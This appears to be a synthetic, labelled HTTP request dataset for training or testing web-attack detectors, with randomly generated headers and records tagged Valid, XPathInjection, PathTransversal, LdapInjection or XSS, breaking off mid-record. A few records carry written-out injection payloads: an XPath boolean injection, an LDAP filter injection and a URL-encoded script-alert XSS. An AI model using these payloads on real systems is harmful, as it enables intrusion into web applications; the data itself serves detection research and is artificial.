ETag: W/"wqr0_qjGdgSGaE1Ir.8"
Expect: poFmtt=tloiG1;s7auea=qjnzhO
From: ehmije@nnt84tTw.st
If-Modified-Since: Thu, 29 Apr 04 02:53:56 CET
If-Unmodified-Since: Fri, 08 Apr 05 13:44:18 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 30 Mar 08 22:43:50 CET
Max-Forwards: 4
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM cG5nenNpZWlmMW9kaGFlZGlsd0huZWJhdGVlZW1lcHQyb3Nlbw==
Authorization: Basic dkxqaWx1ZTphcnRl
Range: 305943-294113,0-,-7372
Referer: http://ttrc.net/ceidetr5/ieefwt1t/ciejhj/Epoafir/ozevti8t.css
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.5 (X11; U; Solaris 8.4; to-it; rv:7.6.5) Gecko/12871268
UA-CPU: MIPS
UA-Disp: 6556,232,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 610x5370
Via: 7.9 215.35.113.94, HTTP/2.6 55.105.73.124, 1.6 www.3obVceoR.htm
Transfer-Encoding: e6iB; tmmbrnnc=hEtmqcs
Upgrade: ercu/0.8, 0hiEfa/9.7, iMd25D/0.0
Warning: 696 84.193.51.16 "ch1tuoo" 
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 590618
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

awaeb=inLrebpaccess_logee&titawe=9si5tZiuczgsstKe&eeanznhehmiro=evuaaadminyem8)awd&hiNtmnatomeee=1&SAdepaStai=one@gee3[&o4iBsmSrumbTi=epBstyU&aeymb5yoEahOtbn=OhmrensNeq ahtn&hlOt5pnwoh=aF83X9cw&ejde=80&doloNhrlaoego=a8W&riag=6817311&iiepYOea=26437486&eiC43r=teodhsqemnt8g5c&nrqcR=sdyroeegTin

End - Id: 32686
Start - Id: 48694
class: XPathInjection
PUT /mLSx.gl-LLEQU/ehtaptesarjelcooa49n.swf? HTTP/1.0
Content-Length: 282
Content-Language: o
Content-Encoding: identity
Content-Location: http://e6eeio.org/a6hdama/coi2/hepyhmxX/nceat/neeg.jpg
Content-MD5: dGN0c25leUFoblNzbmluRA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 10:09:36 CET
Last-Modified: Fri, 25 Jan 08 07:19:59 CET
Host: 207.175.156.104
Connection: qcSreata
Accept: application/postscript;q=0.6
Accept-Charset: x-mac-cyrillic
Accept-Encoding: *
Accept-Language: iiswehel-ftlD;q=0.9, kry-S;q=0.9
Cache-Control: no-transform
Client-ip: 140.188.172.60
Cookie: ekciECSecopyDY=14955;srUleodueoo=55;tpSeenetcliG=ps';airaaocitpWtwn=twnse4;ntatGv=eWOcJ;JdivXVuRA=92921
Cookie2: $Version="590"
Date: Fri, 11 Jun 04 19:02:48 CET
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: 100-continue
From: i1istd@23tm.net
If-Modified-Since: Thu, 11 Mar 10 05:01:09 GMT
If-Unmodified-Since: Mon, 05 Jan 04 13:43:02 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Apr 07 18:23:18 UTC
Max-Forwards: 743
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: Basic SXR2dTp1bkljZGE=
Range: 569156-2482
Referer: http://tpoapso.uk/vmwwAmon.aspx
TE: gzip,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/2.7 (Windows; U; Windows NT 7.9; et-fh; rv:8.2.4) Gecko/80804649
UA-Disp: 527,267,32
UA-Color: color16
UA-Pixels: 640x9904
Via: 5.2 96.130.108.219, 4.0 230.93.196.168:3142, fT9/2.1 www.tuyssr.htm
Transfer-Encoding: gzip
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Serial-Number: 3185085450816900238
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eGNlV=tsa&6dbinaT=geatixi'    or  (i <    count(afny7/child::text())   and  j     < count(rhs/child::comment())    and  k     < count(6otg7/child::*)    ) or   'se'   ='     tcerdnxo'    or&grA=roLyixv7&Cnot68ised3al=3oeoe

End - Id: 48694
Start - Id: 21275
class: Valid
GET /hqKccR2G/@X9P0DWoOJV/e6uaOAb.htm? HTTP/1.1
Host: www.svhtnlea.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: b9r-aiby6zco, ni-eo6a, yepp-utae, iideFf-NtHn
Cache-Control: no-store
Client-ip: 83.86.54.168
Cookie: aplhThDntpwR=Tiu
Cookie2: $Version="184"
Date: Thu, 19 Oct 06 01:55:33 UTC
ETag: "HPxL4jZpZyyUG8R9TSXv"
Expect: hOsusai=daoao;7tesylm=de1l
From: rodie@O0kE.st
If-Modified-Since: Tue, 18 May 04 12:55:08 GMT
If-Unmodified-Since: Mon, 19 Nov 07 21:23:36 UTC
If-Match: *
If-None-Match: "DUPnLazGC-NxEGv.m"
If-Range: Fri, 17 Aug 07 16:00:40 UTC
Max-Forwards: 121
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="2acwtna"
Authorization: NTLM dHB0dHVib21kZGc2dHJldGVoYmhpdXNtaTBlZVRoaW90bWF6YWljbg==
Range: 793-,8602-038713,9-
Referer: /ates/ous5dv/snioE/oaInkig/nR9w.cgi
TE: trailers
Trailer: TE
User-Agent: Mozilla/9.7 (Windows; U; Win98 6.5; ay-qs; rv:3.3.1) Gecko/19230642
UA-CPU: PowerPC
UA-Disp: 552,365,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 714x7693
Via: 1.1 www.natcv.shtml:316, 8.7 www.ahsuptsc.gif:7855, lh0ons/6.6 www.aateatt.png
Transfer-Encoding: gzip
Upgrade: aiaUud/7.9
Warning: 031 41.122.125.127:7076 "Eiaoenuons" 
X-Forwarded-For: 172.206.4.103
X-Serial-Number: 900444
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21275
Start - Id: 45264
class: PathTransversal
GET /./? HTTP/1.0
Host: www.fcmmaO3Ns.de
Connection: keep-alive
Accept: video/*;q=0.7, text/plain;q=0.4, audio/x-wav
Accept-Charset: euc-jp;q=0.1, cp-950;q=0.7, iso-2022-jp, iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=10
Client-ip: 201.215.206.187
Cookie: irPf=1078178152;cfmm=ene;;ugea=ahbdzdesbu;mui8aUlhIi=eO7;wthT5eoutati=xOinlte~a-'s  Js|go
Cookie2: $Version="36"
Date: Sun, 13 Aug 06 13:08:51 GMT
ETag: W/"ba2N-LW3dBH.hNtm3T"
Expect: Neeot=itd7nde;ouozt=rtir
From: geleR@t0uaaRegG.gov
If-Modified-Since: Sat, 26 Jun 04 08:33:37 UTC
If-Unmodified-Since: Thu, 25 Oct 07 22:02:20 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 08 May 05 20:41:13 UTC
Max-Forwards: 91
MIME-Version: 1.7
Pragma: talghohn=geah
Proxy-Authorization: Digest opaque="llhOiEo"
Authorization: heeno IeuEns=iPrerssw
Range: -249,23568-43
Referer: /e9e9mlht/eElnte.wav
TE: chunked
Trailer: Host
User-Agent: Mozilla/1.8 (X11; U; Solaris 9.3; hs-do; rv:7.0.5) Gecko/96935041
UA-CPU: 68000
UA-Disp: 783,7858,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: deflate
Upgrade: t7aRna/4.0
Warning: 818 34.35.11.44 "vgorcns3pysalnN4" "Sat, 01 Dec 07 05:44:35 UTC"
X-Forwarded-For: 118.3.52.80
X-Serial-Number: 67855229
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45264
Start - Id: 20931
class: Valid
GET /e1ad/Fgroup byh/njhtfifgLEezG/hwReemtatsrto5n/iv/raoh/yntEIdt.htm?remvtntbalc=%255es5svrseT&6bhetnHnchi1gm=r62%27mocha&fehtzsj1iyu=%3B HTTP/1.0
Host: 60.228.6.23
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15, cp-950, windows-1250
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=18443
Client-ip: 223.91.161.37
Cookie: ltnmd=059;GzjLJ=jtidracceptt/;ET9OfiLtKxd='d;z56nmueusTvtt=t x%Vrats;esutp=r;ee4o=Lrwda
Cookie2: $Version="195"
Date: Fri, 04 Sep 09 11:07:31 GMT
ETag: W/"v_4FyylPyObApIV"
Expect: sbmyjz=nf9bml;nyae
From: nu4eam@Terdm.fr
If-Modified-Since: Sat, 07 Mar 09 04:37:54 UTC
If-Unmodified-Since: Tue, 23 Sep 08 18:52:53 GMT
If-Match: *
If-None-Match: *
If-Range: "_ltRZ4Orx.c4zq-uNrJ"
Max-Forwards: 839
MIME-Version: 3.4
Pragma: t6hdn9='9rsuS'
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: Basic YXNtdHMyTjpUdE5zZXI1YQ==
Range: 91-032949,093525-505808
Referer: http://uhTn0vn1.cz/7Qnsnis/ciytI/acihhnto.mp3
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.3 (Windows; U; Windows NT 1.2; Yh-r9; rv:9.6.5) Gecko/15132710
UA-CPU: MIPS
UA-Disp: 0973,375,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 893x470
Via: 2.2 www.niat.html
Transfer-Encoding: gzip
Upgrade: de7/0.8, frcre/7.5
Warning: 328 40.44.180.235:467 "waPoatoStfremrctoitm" 
X-Forwarded-For: 61.167.166.225
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20931
Start - Id: 8037
class: Valid
POST /sunionW9ZK5/D7UVtJHG1dhhtaccesZccat/ysaefL4exaen455nt/neX@7g2h3TG_iAVGO8nL/o6dC82A-1/r1x-A50vKzve/5I82s/n5OgadSTQi.jsp? HTTP/1.1
Content-Length: 153
Content-Language: tltpi3Nn
Content-Encoding: compress
Content-Location: /45rr/tYali/Nr9i/tlEmah3.pdf
Content-MD5: aXJ0c2E1cnplcWh0aDN4bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Aug 05 08:26:46 UTC
Last-Modified: Fri, 06 Aug 04 02:29:44 GMT
Host: 186.157.133.4:140
Connection: hfey8odo
Accept: */*
Accept-Charset: x-mac-chinesetrad, windows-1254, cp-936;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: min-fresh=18743
Client-ip: 245.92.71.70
Cookie: t0steouCte3daAm=iLuinrtb4earb
Cookie2: $Version="526"
Date: Thu, 09 Dec 04 14:23:58 UTC
ETag: W/"T0jQS43MmMHV-6sFBK"
Expect: storrieg
From: eceaIe@alofoT.net
If-Modified-Since: Wed, 26 Aug 09 08:17:50 UTC
If-Unmodified-Since: Wed, 17 Oct 07 10:28:53 CET
If-Match: *
If-None-Match: *
If-Range: "vyBxYNzRi9OMvM95QE3"
Max-Forwards: 68
MIME-Version: 6.1
Pragma: llds='sn'
Proxy-Authorization: NTLM dGJ0dHd1b1RvYW1pZmhsOWN5RW13bWRpZWI4YXN1M29v
Authorization: NTLM T3c2ZXl3MWlhcmk0QWJzYWF3b3JpbzBpaGx0OHJya3Roa2FIYmI=
Range: 242584-128530,-8535
Referer: http://www.qtewu.net/sA78i/oxe8.php
TE: chunked
Trailer: Accept-Language
User-Agent: tioraiosoreonsela
UA-CPU: x86
UA-Disp: 5540,780,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 981x443
Via: 7.0 196.148.55.218:1191
Transfer-Encoding: compress
Upgrade: tOtx/4.6, hie/5.3
Warning: 421 134.29.175.59 "Rstu" "Fri, 12 Mar 10 02:59:36 GMT"
X-Forwarded-For: 243.241.144.79
X-Serial-Number: 8061292856047
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sl9gtio1uTis=9658405&rHx3t=dUe9G&hztw=sL6RpswwdwFN&hy3jW5@SpGC=tie&Esfs8T2ot=gAocdrlhour3ddjedR&cMWaI=i&lftrottda=hhtedmxhra8l&e2nmltnhaus0ba=sLCEztEWjP9

End - Id: 8037
Start - Id: 38684
class: LdapInjection
GET /it4vyefeae2/VwYH0/ndWlETX4LXzcsvEy/aP1mR.S2iLKRmYi8WM/6uJvpBeSvG/iatreialsOlIgo/sAHYxcg.pl?-JDPE=h6dl&iD6hl=4265&oxaLhyGxmghnp=aaI%29%28+++%7C%28Rh0p%3D*%29&o0tx6stRkoen=7848167&viPe=2619287&tol=leeatait HTTP/1.0
Host: www.uhaEr.de
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: iso-8859-4;q=0.8, x-mac-icelandic;q=0.9, x-mac-chinesesimp, iso-8859-2;q=0.2
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.6
Cache-Control: 64='ade'
Client-ip: 82.134.209.134
Cookie: biehc=671;5KGtHQ=t6mua;nap=innta
Cookie2: $Version="32"
Date: Mon, 27 Oct 08 17:43:05 GMT
ETag: "EvxKQQHQRlpZyyner"
Expect: Nh7w=4aegcen;feoka
From: nTromT8u@pzcel.it
If-Modified-Since: Thu, 13 Apr 06 11:19:46 CET
If-Unmodified-Since: Mon, 26 Apr 10 13:20:51 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 88
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Digest uri=/wFna/steasqe/ha9det/lseta/NshrUe3e.mdb
Range: 798895-
Referer: http://www.nbh3.fr/nnqliu.png
TE: trailers
Trailer: Warning
User-Agent: ees1Iu28e/5.3
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6318x7597
Via: xp7ts/8.6 www.rBeme1h.html, 0.0 46.178.138.131
Transfer-Encoding: deflate
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 337 166.46.236.159 "olmOlIzulsOaexht7zh" "Wed, 19 Mar 08 23:51:06 UTC"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38684
Start - Id: 99
class: Valid
GET /uo/lal0Sahrataco/fclzzGWptRcJol7K/iiGLxInL7Or.wJ0ePe_z/eosiLtAgasrErifsvo/r9h5cabmltolmetp/G@wnetcatj0VR.tiff?tszi=oeT&0non4=963&et8af=ahee&mdh4irnmsety=a%3C0aomi%5C36un5my%3Bsur%3D+&XvbscriptandeLftpAT3Ab=33148 HTTP/1.0
Host: 109.190.193.51:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: utf-7, iso-8859-15, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 113.43.232.139
Cookie: Oezaeps=786;mirltaie=myh1v6oy;k93xsoiny=31436;di=9636425;vAlitebcD6t=uZI
Cookie2: $Version="917"
Date: Wed, 05 Mar 08 15:34:29 CET
ETag: "1NV4XqgiJUYiToGTJsuy"
Expect: d4es
From: EoHehctl@aabyts.be
If-Modified-Since: Fri, 23 May 08 18:09:01 GMT
If-Unmodified-Since: Tue, 26 Apr 05 17:43:58 GMT
If-Match: *
If-None-Match: "99iWPwXO9qlhbzV"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM aUVlaHU3dzFlaXJldHJ1bGZyZWVzZUV0YXRpZWY0ZHR0YXJ3
Authorization: NTLM THBoZTlpZWx3MGUwd3JhaG4wTGVweTRkb2N5ZWFhZ2NheHp1
Range: 41396-563,553741-
Referer: /rTta/w5eoj.css
TE: chunked
Trailer: Date
User-Agent: Mozilla/9.3 (Machintosh; U; Mac OS X 6.3; no-ag; rv:3.0.2) Gecko/36562662
UA-CPU: MIPS
UA-Disp: 156,678,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5749x1102
Via: HTTP/6.0 www.l7trvsd.gif:6312, omgf/5.7 76.165.237.234:19
Transfer-Encoding: gzip
Upgrade: 6fi/2.6, zosvm/9.8
Warning: 072 208.33.148.233:391 "ceisHREdehQstgAa" "Wed, 04 Jul 07 07:49:02 GMT"
X-Forwarded-For: 137.18.70.212
X-Serial-Number: 9265848475
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 99
Start - Id: 8065
class: Valid
GET /g2xeZPhNgoXHH0/iRgex_0/Odivwam8/6p/pPHRxk_UERo82FrzuTKl/eUSLS/6AKhQGT/Z74JmorHfV9ZA7ht/dA3b/-xZPnB6telnet5@/rV4L-z.tiff?9rmJlibT-=fhtleglocwersg&cuahra=t9DOx&Do7naadtih=03492 HTTP/1.0
Host: 44.114.33.143:0
Connection: reds
Accept: application/*, application/postscript;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: o1yh-1;q=0.7
Cache-Control: max-stale
Cookie: Cotut1new= ;WqwE=@G2io;bQY9P=aMLK6x;thleurxH=8305;OzaHvf9RA5dD=ThicCoehuxwstN;Nreiwi5cy3oacyx=h7
Cookie2: $Version="3"
Date: Sat, 10 Apr 10 10:48:08 UTC
ETag: "i@LyVRiJBg.TKyFZ"
Expect: 100-continue
If-Modified-Since: Fri, 21 Mar 08 11:28:33 CET
If-Unmodified-Since: Thu, 29 Mar 07 21:01:04 CET
If-Match: "FEnb6j6mr.wqE9bmBo4O"
If-None-Match: "-8OcdEu96RQ9x_H"
If-Range: Tue, 30 Mar 04 15:29:31 GMT
Max-Forwards: 461
MIME-Version: 4.3
Pragma: e1p='aWe'
Proxy-Authorization: YsN39r adouz=1z3nk
Authorization: Digest realm
Range: -7887,3458-,5341-
Referer: http://www.rvfht.com/h9yictt.shtml
Trailer: If-Match
User-Agent: sldcoi6ArockcHwns6h
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 782x8382
Via: FTP/3.8 www.jedn.jpg
Transfer-Encoding: eyha1
Upgrade: E8t/1.5, bnr/0.9, lvct/2.3, 09uusr/6.3, mesee/9.5
Warning: 742 www.5eiisbn6.jpg "s7nmb8eks7phhnpbq8e" "Thu, 28 Apr 05 22:22:02 GMT"
X-Forwarded-For: 247.192.186.78
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8065
Start - Id: 47665
class: XSS
GET /bi6/zddur0a/ej.xByA9/wObsYR.Q94K.z3u0/aBhQ2IzqSo/taaiHoSecepoiO1TT8e/e8KiGSvoedGFD/eh.html?6ae=%3Ca+++href++++%3D++%22+++about%3A%3Cs%26%2399%3Bript+%3E%5Balert+%28%27laac%27%29%3B%5D%3C%2Fscript+%3E+%22+++%3E HTTP/1.1
Host: www.ldnfuQdEqi.cz:60817
Connection: et15n0i
Accept: application/*;q=0.4, image/jpeg, audio/x-wav;q=0.6
Accept-Charset: hz-gb-2312;q=0.1, iso-8859-1, iso-8859-1;q=0.4, koi8-r, windows-1252
Accept-Encoding: 
Accept-Language: sdi6nC-oaceu, rssF9t-iAndre;q=0.5
Cache-Control: ea6eab=h
Client-ip: 39.154.184.38
Cookie: Lhea=2438;gyyp7biehlge=Ltwh;mtexs=4163
Cookie2: $Version="8"
Date: Tue, 30 May 06 09:55:35 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Sat, 28 May 05 05:25:33 UTC
If-Unmodified-Since: Sat, 06 Feb 10 09:42:22 CET
If-Match: *
If-None-Match: *
If-Range: "l_ORPJKEZn2GZH8S"
Max-Forwards: 71
MIME-Version: 7.7
Pragma: co=ibi
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest qop=aae5
Range: -017,-1,-32
Referer: /8tniofsa/t3dE/Gihdon/pTopitt.dll
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/0.3 (compatible; MSIE 2.6; Mac OS X; dor8e7gn; eewi; hrrqioibc)
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7165x674
Via: 5.2 www.ehbHn.css, 8.5 www.ltsezrh5.jpg, 2.4 113.100.143.32:20
Transfer-Encoding: compress
Upgrade: lica5r/6.9
Warning: 036 www.sm7aE.jpeg "OA9la" "Thu, 19 Nov 09 13:07:50 GMT"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47665
Start - Id: 8009
class: Valid
PUT /ekkihOhhGs/NXadhhni2Stdyngage/hNHXYRtth@qfY82cav5.js? HTTP/1.0
Content-Length: 302
Content-Language: eotr,rlrq4abo
Content-Encoding: compress
Content-Location: /tasA85s/tlei/eovw9nde/6lsa/2ciidtx.tar
Content-MD5: T0dibW1seW9zZHM1cDluaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Aug 08 13:29:49 UTC
Last-Modified: Wed, 11 Feb 09 23:45:11 CET
Host: www.odlBtkurfd.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1250;q=0.2, ks_c_5601-1987
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: esrrdite=c54naU
Client-ip: 79.219.44.130
Cookie: nrjayob5uuyet=26366;2in0oyNthc=e xho;oursrterdx=ir;e1epmnpf< ihn:+;access_logF7V7-XnG=z| ;gugxAoelhn=24;aloleeaeiaE=wRcHatt
Cookie2: $Version="60"
Date: Tue, 14 Dec 04 09:28:52 GMT
ETag: "Uor8lt.MJfvmU1Tkr"
Expect: 100-continue
From: itepe@sh8wbe.it
If-Modified-Since: Tue, 16 Dec 08 15:07:43 GMT
If-Unmodified-Since: Wed, 13 Oct 04 15:30:06 UTC
If-Match: *
If-None-Match: *
If-Range: "uazTvMrK6hIN_GpMN8sf"
Max-Forwards: 18
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM U2RyZXRvYmNycW9yZHNlWUFxb2VudHRvYXJjNmJBc0NzbzdvYnR3cw==
Authorization: 8tff ecom=resc
Range: 439-82,94-,67-
Referer: /noeeearg/wkhynatc/qakr.pl
TE: deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.9 (Windows; U; WinNT 0.6; xa-ie; rv:2.9.6) Gecko/95920960
UA-CPU: PowerPC
UA-Disp: 6556,373,32
UA-OS: Linux
UA-Color: color16
Via: 0.7 143.157.112.200, HTTP/3.9 46.203.255.95
Transfer-Encoding: deflate
Upgrade: ceIre/8.2
Warning: 335 140.161.205.35 "oreHylenmuo4vest" 
X-Serial-Number: 6980972846
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pi=insert]1rdelete&nhhAUdmm8aps=ooesr&AhtacceshZservicessi2Y4=73854&m8oefettNqas=okzO2&0mtweetbreel=edeleten6btilunph-enp&ir77nsArghcnnXu=t+aRxml&RetCCy2oe=47951&FrSiNPjTEau=lyi))/oipeoi&teawrthsn=erme l&fs=intSe8idpe3hvautoexecb&lomo=21426874&onsomiynkh=  hcw s4es~&ell=hDndSvL&gn3ut=aLOlb

End - Id: 8009
Start - Id: 17448
class: Valid
GET /ZLiframeNFGh8includeEobjectJCs/ahageo/mAxwoiDo/e3EPzc/uJF/aIsTlal7cje.htm?t2tkeiqea=Hia1atee0ey&3ddiofhrr=09265407&tO6aRx=c3pyeLnimetih5&6dxee=Vizig&ak=33976084&lSrmp7s=611647435&tmdeLtaa7elx=456404&rspbematytm=eL8k4FWZ7vT HTTP/1.0
Host: 179.232.196.163:80
Connection: keep-alive
Accept: text/*, audio/x-wav, application/postscript;q=0.3
Accept-Charset: x-mac-greek;q=0.6, x-mac-chinesetrad, us-ascii, x-mac-greek, gb2312
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=2854
Client-ip: 141.4.227.36
Cookie: y1nceawNx0sehf=225;ANEOOi2kSyu-=[Rmnt@o;tegah2lsTioNo=nsa4Gs;TtstnAAwwdejr=cdbino8@wothm
Cookie2: $Version="95"
Date: Wed, 15 Oct 08 04:33:11 GMT
ETag: W/"@LqZW-oXLjeoPcXA"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: 6osilt@7iEee.st
If-Modified-Since: Mon, 11 Jan 10 21:29:44 CET
If-Unmodified-Since: Tue, 22 Feb 05 18:17:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4348
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic YXRrYWd0eWo6bG41SHJO
Authorization: anTwc rsspte6y=5Njsh
Range: 9-86744,230338-150282,297-98990
Referer: http://fmSlro.uk/snew/e9taemm.png
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/5.6 (Machintosh; U; Mac OS X 5.7; 6t-Sr; rv:5.3.9) Gecko/43780272
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 211x6880
Via: 5.7 3.29.53.78, 3.0 73.208.38.8
Transfer-Encoding: identity
Upgrade: aAc/1.9, ntnoe/0.6, faiehi/4.5, ttsl/3.1
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 52284057
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17448
Start - Id: 13432
class: Valid
GET /octe/KXIexec/1Oc6EGGV.exe?ochue6ae=rcpct1wm&j1herniicisi=sspassthruhr8c3&ty=7448391&teknwjsltGmrn=470&6huts9=bdh+%5DdocumentsdHs&anzlu0sy=aeIorhrydefdsgsa&tc=l+oim&y0wRr7qO=aAqitYchildtpwufgil HTTP/1.0
Host: 4.0.63.24:80
Connection: 8tad2of
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=758
Client-ip: 148.219.86.208
Cookie: a8geeloN35anoMi=eo;USYJhN6Rwinntid3=1uh_-T9Rq;ehOmndtlvaba=eiE4mosuevalwinnt>e
Cookie2: $Version="524"
Date: Wed, 23 Mar 05 17:45:51 GMT
ETag: W/"cAVI@vuiXnK-wTp8"
Expect: ert7Te=r2qane;oyn2p=eexi
From: mofh@F9slaieWr.com
If-Modified-Since: Sat, 03 Jan 09 06:21:55 GMT
If-Unmodified-Since: Tue, 24 May 05 14:32:24 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 182
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM bGFlYXpvOW50b29zOXRhamVhZWVvcmlmU0Fydmh0dFk=
Authorization: NTLM bXBlaHQ4M3BoZWF4ZmVlYnBlN2FhRUUzc250dzUwaWVxZTBycm8ybGlzZjBB
Range: 7322-
Referer: http://www.9scfv1eo.org/oyFweg/szhe/H0ioie.cfm
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.9 (Windows; U; Win 9x 4.7; to-51; rv:1.5.3) Gecko/43674109
UA-CPU: x86
UA-Disp: 507,141,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 661x4416
Via: rI0fn/2.0 233.149.71.132, HTTP/3.6 167.220.247.119
Transfer-Encoding: identity
Upgrade: 9ItrTa/4.9, sege/5.6
Warning: 040 www.md2Oee7.html "8eDFiNdsrzhsqhjpn7d" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 8913868514720115974
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13432
Start - Id: 14757
class: Valid
GET /dpto/NautoexecFc/winntouqhome/i6NUEsae/xbtElazdnlT/p0aerKv1rZb/9ersO.exe? HTTP/1.1
Host: 126.137.146.231:89339
Connection: keep-alive
Accept: application/rtf, video/*, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: q0-ned;q=0.1, tl-rob, yed-slh;q=0.0, gut9m-T0rory;q=0.2, y8c-tuOqrrOg;q=0.4
Cache-Control: max-age=4335
Client-ip: 251.25.146.32
Cookie: x3kGo=imtui
Cookie2: $Version="21"
Date: Wed, 18 Aug 04 18:54:01 GMT
ETag: "APGpywQRqorY-BwL"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Fri, 21 Jan 05 04:01:34 GMT
If-Unmodified-Since: Tue, 12 Jan 10 01:24:44 UTC
If-Match: "jaCFAMOBVF_h9dgOrTb"
If-None-Match: "epIIOX5-xQUp_Aet0oH"
If-Range: "vDI082X6uPALwpxQc5_3"
Max-Forwards: 97
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: el3ew eon38=myylbi
Authorization: NTLM cGNzcnZsZ2VydEl1ZXJmc3RsZXRlM2gyZTRwNm5qcjhldDVjYQ==
Range: 31145-
